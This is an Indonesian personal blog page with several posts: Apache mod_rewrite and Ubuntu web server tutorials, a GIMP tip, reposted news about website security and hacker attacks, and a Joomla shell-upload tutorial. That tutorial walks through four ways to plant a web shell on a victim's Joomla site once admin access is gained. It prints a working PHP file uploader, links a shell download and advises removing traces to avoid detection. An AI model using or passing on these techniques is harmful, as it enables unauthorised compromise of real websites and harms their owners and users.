Home » All posts

Trik URL Rewriting

Posted by Toro Rahman Aziz Kamis, 28 Februari 2013 2 comments
Apa sih URL Rewriting?  URL rewriting adalah penulisan ulang URL (jiah cm ditranslate doang  -_-). Gimana ya, susah mengungkapkan nya dengan kata-kata (yaelah, bilang aja kgak tau). Kalo disuruh ngasi tau apa definisinya/pengertiannya, saya sendiri juga ga pinter merangkai kata-kata. Baiknya langsung aja saya kasih contoh.
Misalnya ada sebuah tautan/URL ---> http://kimcila.biz/index.php?type=perawan&level=1 
 
Struktur URL tadi mungkin kurang begitu mudah dipahami oleh sebagian orang, kalau URL dengan struktur yang diatas sulit dimengerti oleh manusia, apalagi dimengerti oleh mesin pencari, bisa-bisa website kita jauh dari pencarian. dan efeknya  berkurangnya visitor, jadi berkurang pelanggan, sehingga penghasilan juga berkurang L. Jadi URL rewriting juga sangat berpengaruh dari sisi SEO website kita .URL diatas akan lebih baik jika strukturnya seperti ini ---> http://kimcila.biz/layanan/perawan/1 .  Nah,, gimana caranya buat URL rewriting kaya diatas?
Mari kita bahas Caranya, pertama syaratnya yaitu:
> Web server yg dipakai Apache (kalau web server yg lain belum tau saya)
> Modul mod_rewrite
Aktifkan dulu modul mod_rewrite , caranya : buka file konfigurasi nya di folder apache, trus cari file http.conf
Uncomment baris seperti di bawah ini (hilangkan tanda #).
#LoadModule rewrite_module modules/mod_rewrite.so
#AddModule mod_rewrite.c

kalo udah, restart service apache nya.

Di dalam modul mod_rewrite, ada dua fungsi. Yaitu fungsi RewriteRule dan RewriteCond. RewriteRule adalah fungsi yang sangat sederhana untuk memberitahu mod_rewrite apa yang harus dilakukan Sedangkan RewriteCond dipakai untuk memeriksa suatu kondisi, mirip dengan konsep if … then … .
Aturan penggunaan RewriteRule adalah sebagai berikut:
RewriteRule Pattern Substitution [Flag(s)]

Pattern itu maksudnya pola/struktur url yang dibuat, trus kalau substitution adalah file yang dituju untuk keperluan pemrosesan selanjutnya.

Kita coba RewriteRule yg simple dulu,
Buat file php dengan isi seperti ini
    <?php echo “test simple url rewriting”; ?>
 
simpan dengan nama test.php


Kemudian buat file .htaccess yang isinya begini :
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteRule ^(.*).html$ $1.php [NC]
</IfModule>
 
Letakkan file .htaccess ini satu folder dengan file test.php , nah sekarang coba akses file test td di browser dengan URL http://localhost/test.html jika muncul tulisan test simple url rewriting. Berarti URL rewriting kita berhasil. Lhoh ! kok bisa? Kan tadi yang dipanggil test.html,  kenapa malah isi dari test.php yang muncul. Yah itu karena kelakuan si mod_rewrite td,  normalnya ketika kita akses test.html harusnya muncul error 404. Kan file test.html ga ada, tp karena ilmu sihir si mod_rewrite, pas kita akses test.html kita diarahkan ke file test.php, coba aja hapus file .htaccess nya, dan akses kembali test.html, apa yang terjadi?

Aturan yang ada di .htaccess ini juga berlaku untuk semua file, misal ada file login.php, jd ketika kita panggil login.html maka akan diarahkan ke file login.php. Tanda [NC] pada file .htaccess diatas maksudnya yaitu No Case atau case-insensitive alias tidak membedakan pemakaian huruf besar maupun kecil pada alamat URL.
Untuk struktur URL seperti contoh di awal tulisan ini, yg  http://kimcila.biz/layanan/perawan/1 ,
 
coba buat file php dengan isi kaya gini
<?php
switch ($_GET['level'])
{
   case 01:
      $level = 'highclass';
      break;
   case 02:
      $level = 'mediumclass';
      break;
   case 03:
      $level = 'lowclass';
      break;
}
?>
<html>
<head>
   <title>Test URL Rewriting</title>
</head>
<body>
<?php echo 'Anda memesan layanan type ' . $_GET['type'] . ' level ' . $level ?>
</body>
</html>

simpan dengan nama index.php
trus buat file .htacsess nya dengan RewriteRule nya kaya gini :

<IfModule mod_rewrite.c>
RewriteEngine on
RewriteRule ^layanan/([a-zA-Z]+)/([0-9]+) index.php?type=$1&level=$2 [NC]
</IfModule>

Penulisan mod_rewrite harus diapit oleh dan
. Fungsi diatas adalah untuk mencegah terjadinya pesan kesalahan "500 Internal Server Error" saat page request.
Untuk membuat rule baru, kita tulis RewriteRule. kemudian, kita gunakan tanda ^untuk memulai rule tersebut.

([a-zA-Z]+) berarti membatasi agar karakter yang diterima hanya berupa huruf a sampai z baik itu huruf besar atau kecil.
([0-9]+) berarti membatasi agar angka yang diterima hanya berupa angka 0 sampai 9.
Tanda + berarti angka/huruf tersebut boleh lebih dari 1.


Dengan cara seperti di atas jika kita mengetikkan http://localhost/layanan/perawan/1 di web browser, otomatis akan diterjemahkan sebagai http://localhost/index.php?type=perawan&level=1.

Sama dengan

Hanya dengan satu fungsi saja, yaitu RewriteRule, sebenarnya kita sudah bisa membuat URL Rewriting. Tetapi jika dikombinasikan dengan RewriteCond, kita bisa membuat beberapa aturan yang lebih kompleks lagi. Untuk RewriteCond , next  posting  aja yak.. :p

Situs-situs Pemerintah Bakal Dikawal "Tim Macan"

Posted by Toro Rahman Aziz Selasa, 05 Februari 2013 0 comments

KOMPAS.com — Serangan hacker "Anonymous Indonesia" minggu lalu seakan menunjukkan bahwa situs-situs milik pemerintah masih memiliki kerentanan dalam hal sekuriti.

Untuk meningkatkan keamanan-keamanan situs tersebut, diperlukan semacam pengecekan rutin untuk memeriksa celah-celah atau potensi ancaman yang ada.

Itulah yang hendak dilakukan oleh I Made Wiryana, praktisi IT yang juga mengelola situs Presiden RI. Caranya, melalui agen atau program yang akan secara otomatis memeriksa kelemahan-kelemahan yang ada pada situs bersangkutan.

"Jadi istilahnya tes penetrasi. Ada 'tiger team' yang melakukan uji keamanan terhadap situs-situs online. Kalau agen menemukan anomali, misalnya tampilan situsnya berubah, ada exploit, atau kecepatan aksesnya melambat, akan langsung dilaporkan ke tim," ungkap Made dalam percakapan telepon dengan Kompas Tekno, Senin (4/2/2012).

Tiger team atau "tim macan" adalah istilah untuk sejumlah ahli yang ditugaskan mencari setiap kelemahan sekuriti yang ada pada sebuah sistem.

Menurut pria yang juga aktif sebagai dosen dan pegiat Linux di Indonesia ini, pengelola situs online tak ubahnya pemilik gedung yang mesti mengadakan pengecekan rutin terhadap bangunan.

"Misalnya saya sebagai pemilik, tentulah saya ingin tahu, misalnya, bagaimana situasi penjagaan waktu malam hari, apakah satpamnya aktif berjaga atau tidur, lalu apakah sistem pemadam kebakaran berjalan baik atau tidak," Made memberi perumpamaan.

Tentu, pengecekan keamanan pun harus dilakukan seizin pemilik "bangunan" yang bersangkutan karena metode tes penetrasi yang dilakukan persis dengan hacker atau cracker yang bertujuan membobol situs.

"Antara pengecek keamanan dan maling, caranya sama, hanya motivasinya yang berbeda. Kalau maling kan tidak izin dulu, ha-ha-ha," canda Made.

Agar tak salah disangka sebagai penyerang, Made mengatakan bahwa program otomatis ini akan diberi ID khusus yang sebelumnya sudah diketahui oleh pengelola situs. Terkait persoalan etiket, pengecekan keamanan memprioritaskan situs-situs pemerintah, terutama yang sudah memberi izin untuk diperiksa.

Untuk saat ini, metode pengecekan keamanan tersebut baru coba diterapkan di situs-situs pemerintah yang turut dikelola Made, yaitu situs Presiden RI, Wapres, Kemenpora, dan satu situs lagi di bawah Kementerian Pendidikan dan Kebudayaan.

Soal eksekusi program itu nantinya, Made berharap bisa menggandeng pihak-pihak terkait seperti Kementerian Komunikasi dan Informatika serta Computer Emergency Team Indonesia (ID-CERT).

Made mengharapkan semua situs pemerintah bisa turut berpartisipasi dalam program pengecekan keamanan otomatis itu. "Soalnya, aspek keamanan harus dimonitor secara kontinu. Celah sekuriti yang dua tahun lalu belum ada bisa saja muncul hari ini."

Lokal lebih mudah

Untuk meningkatkan keamanan situs-situs online di Indonesia, Made menyarankan agar para penyelenggara sistem elektronik termasuk situs pemerintah dan kalangan bisnis memindahkan data center atau pusat data ke Indonesia serta memakai domain ".id".

Hal ini sejalan dengan Peraturan Pemerintah Nomor 82 Tahun 2012 (PP No 82/2012) tentang Penyelenggaraan Sistem dan Transaksi Elektronik yang mewajibkan setiap penyelenggara sistem elektronik untuk pelayanan publik menempatkan pusat data dan pusat pemulihan bencana di Indonesia.

"Saya sangat mendukung itu (PP No 82/2012) agar keamanannya mudah ditelusuri. Kita bisa minta data soal siapa saja yang akses ke PANDI (Pengelola Nama Domain Internet Indonesia). Kalau domain '.info', misalnya, proses untuk itu terlalu panjang," papar Made.

Dia melanjutkan, kebanyakan situs pemerintah dalam hal ini telah menggunakan domain lokal dengan akhiran ".go.id". "Meski ada juga beberapa yang belum karena berada di bawah departemen tertentu."

Mengenai keamanan situs online milik sejumlah kementerian yang ada di Indonesia, Made mengatakan bahwa banyak di antara situs-situs tersebut merupakan proyek bisnis hasil kerja sama dengan pihak ketiga. "Begitu sudah selesai, maka monitoring-nya tidak dilanjutkan. Di sinilah pentingnya pengecekan keamanan secara kontinu," pungkasnya.
sumber 

4 Trik Cara Upload Shell di Joomla

Posted by Toro Rahman Aziz Kamis, 31 Januari 2013 0 comments
hai ...., dah lama ga nulis di blog.
kali ini ane mo share sdikit bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa.. kali aja ada yg belom tau, kaya newbie seperti ane.

okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.

CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php

[Image: jom15_zps5d089831.png]
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.

[Image: jom13_zps46408fd5.png]
udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php

[Image: jom14_zps9182e03f.png]


CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :p
Klik menu Extension > template manager

[Image: jom1_zps8519f91b.png]
trus pergi di bagian administrator.

[Image: jom2_zpsd4100d72.png]
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> http://fake.hol.es/123/shell/simple_uploader.txt
ato ini


<?php
echo '<b>E1nzte1N uploader</b>';
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; }
else { echo '<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; }
}
?>
mari kita sisipin uploadernya, ane taro dibawah aja.

[Image: jom4_zps8c473e97.png]
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.

[Image: jom5_zpsc119e561.png]
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php

[Image: jom6_zpsb46f9ae3.png]
*kalo ane : biasanya ane balikin lg template admin td ke semula, yg ga ada uploadernya. ane remove lg script uploadernya. biar ga ketauan.
:)

CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita

[Image: jom7_zpsde233746.png]
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php

[Image: jom8_zpsa2810d4a.png]
:)


lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php

[Image: jom9_zps0a6b1c1f.png]
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template "evil" kita td :p
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.

[Image: jom10_zpscc71a5bb.png]
The parameter file /templates/siteground-j15-196/params.ini is writable!
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php

[Image: jom11_zpsa71b6771.png]
:)

hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) komen juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.

okedeh, sekian tutorial cupu bin jadul. dr ane.

Tambahan dr abang Sohai , upload shell di joomla versi 2.5.x



[Image: 309927_556901724320519_1516587677_n.jpg]


[Image: 550018_556901907653834_342723693_n.jpg]


[Image: 408430_556901934320498_1928638876_n.jpg]


[Image: 73394_556901954320496_438723634_n.jpg]


[Image: 309953_556901974320494_2097353767_n.jpg]

Green Code Theme Portal

Posted by Toro Rahman Aziz Kamis, 17 Januari 2013 1 comment

waahh.. uda lama ga posting di blog sendiri..

kali ini ane cm mo share template portal cupu punya ane,
kmaren2 iseng buat sendiri. ya maklum lah.. masi jelek.
namanya juga latihan. cm maen css ama jquery doang.

kali aja ada yg mo nyoba. silakan.

preview



klo mau ngrubah tulisan ascii nya, pake aja ini Text to ASCII, buat generate tulisan nya.



DEMO | DOWNLOAD

Membuat Webserver dengan Ubuntu

Posted by Toro Rahman Aziz Selasa, 04 Desember 2012 0 comments


numpang bikin catetan. kali aja ntar ane kelupaan. jd masi ada backup ingatan di blog. sekalian dishare buat belajar bareng..

1. Installasi
h@niv:~$ sudo apt-get install apache2 php5 lynx
paket yg diinstall :
apache2 = webserver
php5 = engine php
lynx = browser CLI

2. Pengujian Web Server
klo udah diinstall, coba cek pake browser. ketik localhost. klo keluar "it works" brarti sukses install web servernya.
krn ane td udah install browser command line. jd langsung aja cek di terminal. dg perintah
h@niv:~$ lynx localhost
ntar keluar kek gini :
[Image: 2-1.png]
dah works, web servernya.

3. Konfigurasi Website
webservernya dah jalan. skrng buat websitenya dong..
konfigurasi ada di sebuah file bernama default yg ada di /etc/apache2/sites-available/
*biasain klo ngedit konfig'an dibuat backupnya dulu. biar aman. klo error tinggal restore file originalnya.


h@niv:~$ sudo cp /etc/apache2/sites-available/default default.bak

skrng mulai edit file default td
h@niv:~$ sudo nano /etc/apache2/sites-available/default
di baris paling atas, kan ada
[Image: 3.png]

Edit jadi seperti ini
ServerAdmin root@hanivinside.net  #admin webnya
ServerName www.hanivinside.net #domain webnya
DocumentRoot /var/www/ #lokasi file2 webnya
[Image: 4.png]

klo udah disave.
trus restart service webservernya.
h@niv:~$ sudo /etc/init.d/apache2 restart
4. Edit Website
web server udah, lokasi file2 webnya jg udah tau. sekarang mulai edit aja webnya. krn ini cm latian. jd ya edit dikit aja yak.
lokasi file2 website ada di /var/www , misal kita punya file index.html
kita edit file itu
h@niv:~$ sudo nano /var/www/index.html
[Image: 5.png]

klo udah diedit, save dah. skrng coba kita uji di browser.
h@niv:~$ lynx localhost
[Image: 6.png]

5. Pengujian di Client
gimana kalo di uji di komputer laen(client) yg terhubung dg komputer kita(server). disni ane simulasiin pake virtualbox dg OS windows xp.
krn ip komputer ane td 192.168.2.125 jd skrng kita coba masukin ip server kita di browser client.
[Image: 7.png]
berhasil.

klo mo install joomla ato wordpress ato CMS2 laen nya. masukin file2 CMS itu ke dalem direktori /var/www
eh iya.. jangan lupa install MySQL ama phpmyadmin nya. klo pengen pake CMS, pasti butuh database kan. tutornya disini Cara Install PhpMyAdmin di Linux


oke.. sekian dulu dr ane.
ntar ane lanjutin lg tutor buat bikin DNS servernya. jd web kita bisa dipanggil dg nama domain.

Buat Efek Sketsa dengan GIMP

Posted by Toro Rahman Aziz 0 comments



abis blajar GIMP td mlm.. sdikit2 nyobain ngedit gambar pake sopwer open source ini.. terbiasa pake photoshop. pas liad GIMP jd bingung. hmmh.. skrng ane mo berbagi aja, sdikit trik, yg baru ane pelajarin td. buat bikin efek sketsa pake GIMP.

step by stepnya:

1. Buka image / gambar yg mau dibuat sketsa. trus klo udah, pada gambar kita klik kanan > colors > desaturate
[Image: gimp1.png]

2. klo udah, duplikat layer. pencet CTRL+SHIFT+D

3. next.. pada gambar hasil duplikat td klik kanan > colors > invert
[Image: gimp2.png]

4. skrng ubah mode dr layer duplikat td menjadi dodge
[Image: gimp3.png]

5. selanjutnya.. pada gambar. klik kanan > filters > Blur > Gaussian Blur
[Image: gimp4.png]

6. Atur horisontal dan vertikalnya masing2 10 px (eh.. tergantung fotonya jg sih, jd atur aja sesuai dengan hasil sketsa terbaik)
[Image: gimp5.png]

7. klo udah klik OK , hasilnya jd kek gini
[Image: gimp6.png]


HASIL AKHIR
[Image: hasilakhir.png]


Sekian dr Ane.
Ampun

Diserang hacker Indonesia, Israel ancam lakukan balasan

Posted by Toro Rahman Aziz Rabu, 21 November 2012 3 comments

Sejak pekan lalu Israel menginvasi kawasan Jalur Gaza, Palestina, yang dikuasai Hamas. Perang di dunia nyata pun berlanjut ke dunia maya. Didorong sentimen solidaritas sebagai sesama negara muslim, beberapa hacker Indonesia langsung menyerang beberapa server dan situs milik Israel.
Akibatnya, kemarin otoritas keamanan Internet Indonesia (Indonesia Security Incident Response Team on Internet Infrastructure/IDSIRTI) mengabarkan ada pemberitahuan dari otoritas Internet Israel, bahwa mereka bakal dilakukan serangan balasan terhadap DNS server Indonesia. Serangan ini rencananya menyasar domain-domain berakhiran .id.
Ketua Umum Pengelola Nama Domain Internet Indonesia (Pandi) Andy Budimansyah mengaku sudah mendengar informasi tersebut. Namun dari hasil pemeriksaan sementara, belum ada serangan dilancarkan hacker Israel ke domain Indonesia.
"Sejauh ini belum ada serangan (ke domain-domain .id), tapi kemarin memang ada notifikasi dari First Org, itu lembaga semacam IDSIRTI-nya Israel," ujarnya saat dihubungimerdeka.commelalui telepon seluler, Kamis (23/11).
Dia menyebut hacker Indonesia sudah berhenti menyerang situs-situs Israel. Meski demikian, untuk berjaga-jaga Pandi langsung berkoordinasi dengan operator DNS untuk meningkatkan pengawasan dan mengawasi bila kemungkinan buruk terjadi.
"Kita monitor karena DNS kita tersebar di seluruh Indonesia dan di luar negeri, kita koordinasi dengan DNS yang dikelola Indosat, di GPN, di Australia, kita minta mereka membantu pemantauan, jika terjadi serangan kita usahakan ditutup (DNS server itu) sementara," paparnya.
Andy menegaskan langkah hati-hati harus dipersiapkan. Walau lokasi DNS sudah tersebar, jika hacker Israel benar-benar menyerang balik akibatnya tetap merugikan. Karena DNS-lah yang menghubungkan pengguna internet dengan domain .id. Jika server ini mati, tentu situs-situs dengan nama domain khas Indonesia itu tak bisa diakses.
"Kalau server banking atau website-website yang melayani masyarakat tiba-tiba tidak bisa diakses, kan kasihan," tuturnya.
DNS Server yang mengelola domain .id tersebar di pelbagai kota dan dikelola swasta. Namun titik lokasi terbanyak berada di Jakarta. Andy berharap serangan balasan itu nantinya sama sekali tidak terjadi.
sumber : http://www.merdeka.com/teknologi/diserang-hacker-indonesia-israel-ancam-lakukan-balasan.html

Copyright © 2012 Smart Note. All rights reserved.

Super SEO created by Blogger Tuts | Published by GalleryBloggerTemplates.com